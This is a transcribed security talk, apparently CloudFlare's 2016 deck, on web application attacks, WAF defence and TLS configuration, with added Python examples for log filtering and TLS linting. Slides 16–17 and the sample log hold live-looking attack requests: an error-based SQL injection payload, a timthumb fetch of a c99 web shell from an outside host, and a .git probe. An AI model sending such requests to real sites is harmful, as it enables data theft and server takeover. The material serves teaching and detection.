Latest Trends in Web Application Security
Upload: cloudflare
Post on 17-Jan-2017

Page 1: Latest Trends in Web Application Security

Web Application Security

John Graham-Cumming | Chief Technology Officer, CloudFlare

March 2016

Page 2: Latest Trends in Web Application Security

Agenda
• Layered Web Application Security
• 2015 Top Web Application Attack Techniques
• Kitchen Sink Attacks
• TLS

Page 3: Latest Trends in Web Application Security

Introduction

Page 4: Latest Trends in Web Application Security

Our mission

Help build a better Internet

Page 5: Latest Trends in Web Application Security

Standards/Platform | Availability | Security | Performance

Running applications on the Internet is challenging

“Hundreds of dollars a month for private hosting and it was still reliably crashing on or around decision day.”

“We're seeing some customers that are connecting to ixl.com via IPv6, which we are not equipped to handle.”

“The first flood of attack traffic was mitigated with some blocking techniques implemented by our CDN, but when the attack got more creative there was nothing more they could do.”

“Because our servers were only located in the U.S. at that time, some of our customers from other parts of the world were experiencing slower loading of the widget.”

Page 6: Latest Trends in Web Application Security

We solve the challenges of the Internet

Standards/Platform
• Analytics
• IPv6 gateway
• DNSSEC
• Google SPDY + HTTP2
• Apps platform

Availability
• Load balancing
• Always online
• Redundant, Anycast network

Security
• Reputation-based security
• Distributed denial of service (DDoS) mitigation
• Firewall
• Secure socket layer (SSL)
• Malware detection

Performance
• Content delivery (CDN)
• Authoritative DNS
• Web content optimization (WCO)
• Front-end / mobile optimization
• Railgun™ WAN optimizer

Page 7: Latest Trends in Web Application Security

Page 8: Latest Trends in Web Application Security

Layered Web Application Security

Page 9: Latest Trends in Web Application Security

What attackers attack
• Web applications themselves
  • e.g. attempted SQL injection
  • e.g. DoS by hitting CPU expensive URI
• Web servers
  • Attempted access to files on machines
  • SYN flooding to overwhelm TCP buffers
• Related infrastructure
  • Authoritative DNS for a domain / DNS poisoning
  • Domain registration

Page 10: Latest Trends in Web Application Security

Layered Defense
• Secure Coding Practices
• Web Application Firewall
  • Can protect against application level attacks
  • Use one that can be customized for your application
• DoS mitigation service
• DNS service that has withstood large DoS attacks
• DNSSEC
• A domain registrar with robust security policies to prevent transfer

Page 11: Latest Trends in Web Application Security

Buying Time
• A WAF buys time to patch vulnerabilities
• Common to see vulnerabilities announced along with patches
• But how long does it take to patch?

Page 12: Latest Trends in Web Application Security

Examples
• December 14, 2015: CVE-2015-8562
  • Joomla CMS Unserialize Vulnerability
  • Released without a patch
• April 25, 2015: SUPEE-5344
  • Magento RCE Vulnerability
• April 15, 2015: CVE-2015-1635
  • Windows Server RCE Vulnerability

Page 13: Latest Trends in Web Application Security

2015 Top Web Application Attack Techniques

Page 14: Latest Trends in Web Application Security

OWASP Top 10 in 2015
1. A5 Security Misconfiguration
2. A9 Using Components with Known Vulnerabilities
3. A6 Sensitive Data Exposure
4. A4 Insecure Direct Object References
5. A1 Injection
6. A3 XSS
7. A7 Missing Function Level Access Control
8. A8 Cross Site Request Forgery
9. A10 Unvalidated Redirects and Forwards
10. A2 Weak authentication and session management

Page 15: Latest Trends in Web Application Security

Common Web DoS Vectors
• Requests without a user agent
  • Drop requests that have no User-Agent field
• WordPress pingback attacks
  • Drop WordPress pingbacks
• Fake user agent
  • Validate User-Agent to identify real browsers

Page 16: Latest Trends in Web Application Security

Common Web DoS Vectors
• Faulty data sanitization

/skin/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20 count(*),concat((select%20concat(0x3a,md5(1122),\0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%232.

• Exploitation of timthumb for RCE

GET /wp-content/themes/thumb.php?src=http://dsf2kh34as.co/c99.php

Page 17: Latest Trends in Web Application Security

Common Web DoS Vectors
• Incorrect SCM data access

GET /.git/HEAD HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
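The three slides above each describe a request shape a WAF or edge filter should drop or flag: missing or malformed User-Agent headers and WordPress pingbacks (slide 15), the error-based SQL injection payload and the timthumb remote-fetch request (slide 16), and reads of /.git/ metadata (slide 17). The script below is an added example, not CloudFlare's code or anything from the deck: it parses a few constructed access-log lines and returns which rule each request trips. The log format (method, target, "User-Agent" with "-" meaning absent), the pingback User-Agent pattern, the "Mozilla/ plus parenthesised platform" browser heuristic, and the injection markers are all assumptions of this example, chosen to match the requests shown on the slides.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumed shape of a WordPress pingback User-Agent ("WordPress/x.y; site; verifying pingback from ...").
PINGBACK_RE = re.compile(r"^WordPress/[\d.]+;.*verifying pingback", re.I)

# Assumed minimal browser shape: "Mozilla/x.y (" + a parenthesised platform token.
BROWSER_UA_RE = re.compile(r"^Mozilla/\d\.\d \([^)]+\)")

# Markers taken from the slide 16 MySQL error-based payload, matched after URL-decoding.
SQLI_MARKERS = ("information_schema", "floor(rand(", "concat(", "select 1 from")

# thumb.php is on the slide; timthumb.php is the script's usual file name (assumption).
TIMTHUMB_SCRIPTS = ("thumb.php", "timthumb.php")

# Constructed log format: METHOD target HTTP/x.y "User-Agent" ("-" when the header is absent).
LOG_RE = re.compile(r'^(\S+) (\S+) HTTP/\d\.\d "([^"]*)"$')


def classify_request(method, target, user_agent):
    """Return the list of rule names a request trips; an empty list means let it through."""
    reasons = []
    if not user_agent:
        reasons.append("no-user-agent")                      # slide 15: drop requests with no User-Agent
    elif PINGBACK_RE.match(user_agent):
        reasons.append("wordpress-pingback")                 # slide 15: drop WordPress pingbacks
    elif user_agent.startswith("Mozilla/") and not BROWSER_UA_RE.match(user_agent):
        reasons.append("malformed-browser-user-agent")       # slide 15: validate claimed browsers

    parts = urlsplit(target)
    path = unquote(parts.path)
    query = unquote(parts.query).lower()

    if any(marker in query for marker in SQLI_MARKERS):
        reasons.append("sql-injection-signature")            # slide 16: faulty data sanitization

    if path.rsplit("/", 1)[-1].lower() in TIMTHUMB_SCRIPTS:
        for src in parse_qs(parts.query).get("src", []):
            if src.lower().startswith(("http://", "https://")):
                reasons.append("timthumb-remote-src")        # slide 16: remote fetch through timthumb
                break

    if "/.git/" in path:
        reasons.append("scm-metadata-access")                # slide 17: incorrect SCM data access
    return reasons


def scan_log(lines):
    """Map each request target in the constructed log to the rules it trips."""
    verdicts = {}
    for line in lines:
        match = LOG_RE.match(line.strip())
        if not match:
            continue  # not in the constructed format; a real parser would log and skip
        method, target, user_agent = match.groups()
        verdicts[target] = classify_request(method, target, "" if user_agent == "-" else user_agent)
    return verdicts


# Constructed sample lines; the injection target is the slide 16 payload with the quote URL-encoded,
# and attacker.example stands in for the remote host on the slide.
SAMPLE_LOG = [
    'GET /index.html HTTP/1.1 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/49.0"',
    'GET /index.html?page=2 HTTP/1.1 "-"',
    'POST /xmlrpc.php HTTP/1.1 "WordPress/4.4; http://attacker.example; verifying pingback from 203.0.113.5"',
    'GET /login HTTP/1.1 "Mozilla/5.0"',
    'GET /skin/interface/auth.php?&PASSWORD=1&USER_ID=%df%27%20and%20(select%201%20from%20(select%20count(*),'
    'concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20'
    'information_schema.tables%20group%20by%20x)a)%23 HTTP/1.1 "Mozilla/5.0 (X11; Linux x86_64) Firefox/44.0"',
    'GET /wp-content/themes/thumb.php?src=http://attacker.example/c99.php HTTP/1.1 '
    '"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"',
    'GET /.git/HEAD HTTP/1.1 "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"',
]

if __name__ == "__main__":
    for target, reasons in scan_log(SAMPLE_LOG).items():
        print(f"{'DROP' if reasons else 'pass':4} {target[:60]:60} {reasons}")
```

The User-Agent heuristic is deliberately coarse: it catches the empty and bare "Mozilla/5.0" cases from the slide but will not tell a well-forged browser string from a real one, which is why the deck pairs it with reputation-based security and rate limiting rather than relying on it alone.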

Page 18: Latest Trends in Web Application Security

Kitchen Sink Attacks

Page 19: Latest Trends in Web Application Security

Everything they’ve got
• Common to see attackers try multiple vectors to bring down a web site
1. Simultaneous SYN flood, DNS reflection attack, and authoritative DNS attack
2. Using multiple layer 7 (HTTP/HTTPS) botnets at the same time
3. 1 and 2

Page 20: Latest Trends in Web Application Security

Typical DoS volume at CloudFlare

Page 21: Latest Trends in Web Application Security

Recent 400 Gbps DoS attacks

Page 22: Latest Trends in Web Application Security

TLS

Page 23: Latest Trends in Web Application Security

Page 24: Latest Trends in Web Application Security

DROWN
March 1, 2016

Page 25: Latest Trends in Web Application Security

CloudFlare’s TLS Configuration
• Public and on Github
https://github.com/cloudflare/sslconfig

ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
ssl_ciphers EECDH+CHACHA20:EECDH+CHACHA20-draft:EECDH+AES128:RSA+AES128:EECDH+AES256:RSA+AES256:EECDH+3DES:RSA+3DES:!MD5;
ssl_prefer_server_ciphers on;
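The point of publishing the configuration is that anyone can check their own nginx against it. The lint below is an added example (not from the cloudflare/sslconfig repository or the deck) that reads the three directives shown above and reports what a reviewer in March 2016 would flag: SSLv2 (the protocol DROWN abuses) or SSLv3 still enabled, TLSv1.2 missing, explicitly allowed weak cipher keywords, the 3DES fallback as an informational note, and server cipher preference not turned on. Its cipher-string handling is an approximation of OpenSSL's syntax (":"-separated entries, "!" excludes, "+" joins keywords) that does not expand aliases such as HIGH or DEFAULT; the weak-keyword list and the "weak" sample configuration are constructed for the example.

```python
import re

OBSOLETE_PROTOCOLS = {"SSLv2", "SSLv3"}   # SSLv2 is what DROWN abuses; both predate TLS
# Constructed list of OpenSSL keywords that should never be allowed in 2016.
WEAK_KEYWORDS = {"RC4", "MD5", "DES", "NULL", "aNULL", "eNULL", "EXPORT", "EXP", "LOW"}
LEGACY_KEYWORDS = {"3DES"}                 # present on the slide only as a last-resort fallback

DIRECTIVE_RE = re.compile(
    r"^\s*(ssl_protocols|ssl_ciphers|ssl_prefer_server_ciphers)\s+(.+?)\s*;\s*$"
)


def parse_ssl_directives(config_text):
    """Collect the three TLS directives from nginx config text into a dict."""
    found = {}
    for line in config_text.splitlines():
        match = DIRECTIVE_RE.match(line)
        if match:
            found[match.group(1)] = match.group(2)
    return found


def cipher_string_terms(cipher_string):
    """Split an OpenSSL cipher string into (excluded, allowed) keyword sets (no alias expansion)."""
    excluded, allowed = set(), set()
    for entry in cipher_string.split(":"):
        if entry.startswith("!"):
            excluded.update(entry[1:].split("+"))
        else:
            allowed.update(entry.lstrip("+-").split("+"))
    return excluded, allowed


def lint_tls_config(config_text):
    """Return (severity, message) findings; 'high' needs fixing, 'info' is worth knowing."""
    findings = []
    directives = parse_ssl_directives(config_text)

    protocols = set(directives.get("ssl_protocols", "").split())
    for proto in sorted(protocols & OBSOLETE_PROTOCOLS):
        findings.append(("high", f"obsolete protocol enabled: {proto}"))
    if "TLSv1.2" not in protocols:
        findings.append(("high", "TLSv1.2 not enabled"))

    ciphers = directives.get("ssl_ciphers", "")
    if not ciphers:
        findings.append(("high", "ssl_ciphers not set"))
    else:
        excluded, allowed = cipher_string_terms(ciphers)
        for keyword in sorted((allowed & WEAK_KEYWORDS) - excluded):
            findings.append(("high", f"weak cipher keyword allowed: {keyword}"))
        for keyword in sorted((allowed & LEGACY_KEYWORDS) - excluded):
            findings.append(("info", f"legacy cipher keyword allowed: {keyword}"))

    if directives.get("ssl_prefer_server_ciphers", "off").lower() != "on":
        findings.append(("high", "ssl_prefer_server_ciphers is not on"))
    return findings


# The three directives exactly as shown on the slide.
CLOUDFLARE_2016_CONFIG = """
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
ssl_ciphers EECDH+CHACHA20:EECDH+CHACHA20-draft:EECDH+AES128:RSA+AES128:EECDH+AES256:RSA+AES256:EECDH+3DES:RSA+3DES:!MD5;
ssl_prefer_server_ciphers on;
"""

# Constructed counter-example of a server that would still be vulnerable to DROWN.
WEAK_CONFIG = """
ssl_protocols SSLv2 SSLv3 TLSv1;
ssl_ciphers RC4+RSA:EXPORT:AES128-SHA;
ssl_prefer_server_ciphers off;
"""

if __name__ == "__main__":
    for name, text in (("slide config", CLOUDFLARE_2016_CONFIG), ("weak config", WEAK_CONFIG)):
        print(name)
        for severity, message in lint_tls_config(text) or [("info", "no findings")]:
            print(f"  [{severity}] {message}")
```

Because the checker only sees keywords literally present in the string, a configuration built from aliases such as HIGH or DEFAULT should be expanded with `openssl ciphers -v` before trusting its verdict.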

Page 26: Latest Trends in Web Application Security

Conclusion

Page 27: Latest Trends in Web Application Security

Conclusion
• Layered Defense
• Patch but use a WAF to buy time
• Stay on top of TLS